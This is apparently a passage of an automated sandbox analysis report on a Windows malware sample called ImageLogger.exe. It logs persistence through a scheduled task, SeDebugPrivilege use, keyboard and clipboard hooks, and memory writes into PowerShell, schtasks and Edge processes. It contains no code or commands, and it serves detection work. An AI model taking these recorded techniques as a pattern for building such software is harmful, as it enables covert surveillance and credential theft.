Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1424 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\schtasks.exe
PID 1424 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\schtasks.exe
PID 1424 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1424 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 1100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 1100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
